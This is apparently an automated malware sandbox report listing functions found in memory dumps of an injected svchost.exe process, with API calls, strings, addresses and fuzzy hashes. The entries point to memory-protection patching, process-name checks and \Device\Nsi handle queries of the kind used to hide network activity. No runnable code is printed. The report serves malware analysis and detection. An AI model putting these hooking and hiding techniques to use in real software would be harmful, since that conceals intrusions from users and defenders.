Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: A561DA36519B40C6EBA0CB15E45831EBBE4F3D8754F605216EA8E67BA8DB7EC540CF01

Function 0000026A879A12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000026A879A12E0
_set_statfp.LIBCMT ref: 0000026A879A12FB
_set_statfp.LIBCMT ref: 0000026A879A1317
_set_statfp.LIBCMT ref: 0000026A879A1353

Memory Dump Source

Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 7ef8aaefcf1b905b68fa67122955c18c980f192bf2e6b4bd5c6510424708fb32
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 19112532EC3E0001FBE41969E55E3ADB0706B54374F090224AB7637BDAFE1ACC424A07

Function 0000026A879D1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000026A879D1EE0
_set_statfp.LIBCMT ref: 0000026A879D1EFB
_set_statfp.LIBCMT ref: 0000026A879D1F17
_set_statfp.LIBCMT ref: 0000026A879D1F53

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 325e6dd0d984f579dabc2df724599173956b793cad1da30d5df66ae2e0b34588
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: A211A373A98B0001F6D891ADE45F3AD3C40EB64374F5A0625AB76373E6AB1ACC814906

Function 0000026A879C3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000026A879C3886
GetCurrentProcess.KERNEL32 ref: 0000026A879C38B4
VirtualProtectEx.KERNEL32 ref: 0000026A879C38D6
GetCurrentProcess.KERNEL32 ref: 0000026A879C38F4
VirtualProtectEx.KERNEL32 ref: 0000026A879C3915

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 9cb059389f430eefe55732830a83e879fcbc2c0922e6bfc06ba8584c724dddf5
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 5011FA3A705B4182FF949B51F40826D7AB4F788B85F044029DE8D17795EE3EC545CB06

Function 0000026A879984F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026A87998503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026A87998598

Strings

csm, xrefs: 0000026A8799857E
f, xrefs: 0000026A87998516

Memory Dump Source

Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 9c9adf42bdbe15e594f47225c290312529cae0cac6b0b1dfddc7f7636dbbf591
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 3F51A332712A009BFB94CF15E488F5D37A5F384B98F528128DA1A6B788DB36D945CF07

Function 0000026A879984D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026A87998503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026A87998598

Strings

csm, xrefs: 0000026A8799857E
f, xrefs: 0000026A87998516

Memory Dump Source

Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 59c4ffac785529dcdcadff87240a1ef8f544bfcca855935e61c0aa6ef90fdcab
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 8D31D172211740A6F794DF11E888F1D77A4F780BC8F168018EE4A67788CB3AC944CB07

Function 0000026A879C14B4 Relevance: 6.3, APIs: 5, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026A879C14D5
HeapFree.KERNEL32 ref: 0000026A879C14E4
GetProcessHeap.KERNEL32 ref: 0000026A879C14F0
HeapFree.KERNEL32 ref: 0000026A879C14FF
GetProcessHeap.KERNEL32 ref: 0000026A879C152A

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction ID: 503738bbb351b992aa054f619d5032a0360e56ad1c0bab80166c19a25c48d67a
Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction Fuzzy Hash: 2A115832514B89D2FB94DFA6A84821E7F60F789B85F044129EB8E23755EF3AC0518B45

Function 0000026A879C26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000026A879C27D4
StrCpyW.SHLWAPI ref: 0000026A879C27ED

Strings

\\.\pipe\, xrefs: 0000026A879C27DF

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: b7904aae615f521d7812c3f5e65d9e24a3ce78fdd2b7a407f501b4ad358c7a2d
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 9571D43220478186EFA4DF259A483EEB790F7C5B84F444016DE4E63B99DE36C6848F42

Function 0000026A879C24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000026A879C25C3
StrCpyW.SHLWAPI ref: 0000026A879C25DA

Strings

\\.\pipe\, xrefs: 0000026A879C25CE

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: a6c0abc4f2a2b75ba774e9e6d1f259500821b8a5541e7079b06ca42121c14c5d
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 9551DD32204B8182EEF4DF29965C3AEB751F7C5780F454026DE8A23B99DE3BC4458F52

Function 0000026A879D0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000026A879D071B
GetLastError.KERNEL32 ref: 0000026A879D073D

Strings

U, xrefs: 0000026A879D06C7

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 8ca21fce6d0e22c8cf5732f9377e562903c25c7ef9583250b87a770ae0f6e834
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: A341C672715A8081EBA0DF69E8483AE7FA0F798784F844125EE4D97798DB3DC541CF41

Function 0000026A879CD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026A879CD6F9
LCMapStringW.KERNEL32 ref: 0000026A879CD781

Strings

LCMapStringEx, xrefs: 0000026A879CD6DC, 0000026A879CD6ED

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 109b6a62fa6fb2b36cdbe3fe010a87026b8d3f57eb8c45ceefd888f193cb09d2
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 1C111A36608B8086DBA0CB56F88429ABBA4F7C9B90F544126EECD93B59DF38C550CB00

Function 0000026A879C94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000026A879C94E8
RaiseException.KERNEL32 ref: 0000026A879C952E

Strings

csm, xrefs: 0000026A879C951B

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: dcf103bb4589dd5b540d64a674de9561a88b06da2b8737606ccbc7e3f2d77857
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: C1111C32218B80C2EBA18F15E54425DBBA5F798BA8F584225DF8D1BB68DF39C555CB00

Function 0000026A879CD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026A879CD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000026A879CD6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000026A879CD681

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 03b0360fd42107760eec48b338194edc7a88d918eba2d166d42b9dffb87d2d1d
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 88F0E231314B8082FBD4DB41F50829C7F20ABC8B80F884025AE4D23B24CF3AC994CF02

Function 0000026A8799CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026A8799CBC5

Strings

November, xrefs: 0000026A8799CBA8, 0000026A8799CBB2
October, xrefs: 0000026A8799CBBE

Memory Dump Source

Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 9650eb30da5b7a6529ee697977e8b296c7743997b23b3ce03466238b801360dd
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 54E0927120554192FB84DB69F8483ECB221DBA4740F695022951927362CF3ACC86CB42

Function 0000026A879CD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026A879CD631
TlsSetValue.KERNEL32 ref: 0000026A879CD648

Strings

FlsSetValue, xrefs: 0000026A879CD61E

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 35d45f319071ec7e043f06cd9aaf194d67642004657d02158ade06abddba33c1
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: E2E06D71204A4092FED4CB54F90C69C7E22ABC8780F988022D90D27365CE3AC895CF12

Function 0000026A879C1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026A879C1D9B
HeapAlloc.KERNEL32 ref: 0000026A879C1DAA
GetProcessHeap.KERNEL32 ref: 0000026A879C1E1E
HeapFree.KERNEL32 ref: 0000026A879C1E2C

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: b0d2f8c75bfc013734b9faa92ae29b0f6fef55afc5c9f2525d95d49fb7accf6f
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 95218172644B80C2EF91CF69A40825EBBA0FBC8B94F554110EE8CA7B25FF79C5428B05

Function 0000026A879C1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026A879C127A
HeapAlloc.KERNEL32 ref: 0000026A879C1289
GetProcessHeap.KERNEL32 ref: 0000026A879C12A3
HeapAlloc.KERNEL32 ref: 0000026A879C12B4

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 98d8d3de4ce2ba425b96842ab48ec1da97cf51971eb9959754a84dd95e99a7c2
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 89E0C2B1A11A02C6F748DBA6D81835A7EE1EB88B52F49C024C94D07360DF7EC49ACB91

Analysis Process: svchost.exePID: 356, Parent PID: 5796COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	72
Total number of Limit Nodes:	5

Executed Functions

Function 00000179537A1274 Relevance: 5.0, APIs: 4, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000179537A127A
HeapAlloc.KERNEL32 ref: 00000179537A1289
GetProcessHeap.KERNEL32 ref: 00000179537A12A3
HeapAlloc.KERNEL32 ref: 00000179537A12B4

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 6e7ad4a23ee113c94972afa18e5892f6c1cf9dab88b3806c5c8dc1af32ac5ff3
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 2AE039B1A11A14C6F7058BA2D82438937F5EB89B06F488024C90907350EF7D84D9C740

Function 00000179537A3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000179537A347A
PathFindFileNameW.SHLWAPI ref: 00000179537A3489

Part of subcall function 00000179537A3930: StrCmpNIW.SHLWAPI ref: 00000179537A3948

Part of subcall function 00000179537A3878: GetModuleHandleW.KERNEL32 ref: 00000179537A3886
Part of subcall function 00000179537A3878: GetCurrentProcess.KERNEL32 ref: 00000179537A38B4
Part of subcall function 00000179537A3878: VirtualProtectEx.KERNEL32 ref: 00000179537A38D6
Part of subcall function 00000179537A3878: GetCurrentProcess.KERNEL32 ref: 00000179537A38F4
Part of subcall function 00000179537A3878: VirtualProtectEx.KERNEL32 ref: 00000179537A3915

CreateThread.KERNEL32 ref: 00000179537A34D7

Part of subcall function 00000179537A1EB4: GetCurrentThread.KERNEL32 ref: 00000179537A1EBF

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 23a82a55378c246d0ec841d76e9cecdd68e5164837a20dfb0eba84c5fef6eec4
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: FE115B71E3C63182F7639BA1B8563E923F0EB5670DF54012B9A4E86B94EF39C08CC650

Function 00000179537AD130 Relevance: 3.1, APIs: 2, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00000179537AD149
FreeEnvironmentStringsW.KERNEL32 ref: 00000179537AD20D

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
Instruction ID: 79042b1d93504cc8c4419d3936fb3a924f44f0128a7a967f3d6c629648fc6a81
Opcode Fuzzy Hash: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
Instruction Fuzzy Hash: 8F21CC31F28BA481E6219F16A45029AB7B4F78AFD4F4D4126DF9D63BD4DF38C5568300

Function 00000179537A1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000179537A1650: GetProcessHeap.KERNEL32 ref: 00000179537A165B
Part of subcall function 00000179537A1650: HeapAlloc.KERNEL32 ref: 00000179537A166A
Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16DA
Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1707
Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1721
Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1741
Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A175C
Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A177C
Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1797
Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17B7
Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A17D2
Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17F2

Sleep.KERNEL32 ref: 00000179537A1C43
SleepEx.KERNELBASE ref: 00000179537A1C49

Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A180D
Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A182D
Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1848
Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1868
Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1883
Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A18A3
Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A18BE
Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A18C8

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: d488d6aa4593b88235e9775f50eab7aee9e96ec915b67486a12f707cea035321
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 65311239B2862191FB529F36E9513EA13F5AB46BDCF844023DE0F977D6EE24C858C250

Function 00000179537A3930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 00000179537A3948

Strings

dialer, xrefs: 00000179537A3941

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 3f8ff65858361c2d21231e026d063f1c7926eae38b6c62a91ddaf41afc421b43
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: 00D0A730B2961B86FF66DFE188E16E02370EB0670CF448033CA0902714EB198DCDCB10

Function 0000017953772908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000017953772A31

Memory Dump Source

Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 003fea010ce0f30714eb2280857b421f9bd90d63a9d1c744e4eabe7933ad54f1
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: B0612432B0566187EB6ACF15D4847ACB3E1FB46B98F548026DE2D07795EB38E857CB00

Function 0000017953D4B860 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 0000017953D4B8B5

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: ed5e70f076aeb2440185d0008e8c9ef1798c9f1a849db7fb2039aa7b8fb8141a
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: 05F0B47230922541FF576F6298003E513B06F68B4CF0C48338D8E863C2EEADC44C4310

Non-executed Functions

Function 00000179537A2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000179537A2D80
lstrlenW.KERNEL32 ref: 00000179537A2FBA

Part of subcall function 00000179537A1A14: OpenProcess.KERNEL32 ref: 00000179537A1A3A
Part of subcall function 00000179537A1A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000179537A1A58
Part of subcall function 00000179537A1A14: PathFindFileNameW.SHLWAPI ref: 00000179537A1A67
Part of subcall function 00000179537A1A14: lstrlenW.KERNEL32 ref: 00000179537A1A73
Part of subcall function 00000179537A1A14: StrCpyW.SHLWAPI ref: 00000179537A1A86
Part of subcall function 00000179537A1A14: CloseHandle.KERNEL32 ref: 00000179537A1A94

GetProcAddress.KERNEL32 ref: 00000179537A2D95

Part of subcall function 00000179537A1554: StrCmpIW.SHLWAPI ref: 00000179537A1585

Part of subcall function 00000179537A3930: StrCmpNIW.SHLWAPI ref: 00000179537A3948

StrCmpNIW.SHLWAPI ref: 00000179537A2DD8
lstrlenW.KERNEL32 ref: 00000179537A2F00

Strings

\Device\Nsi, xrefs: 00000179537A2DCB
NtQueryObject, xrefs: 00000179537A2D8B
ntdll.dll, xrefs: 00000179537A2D79

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
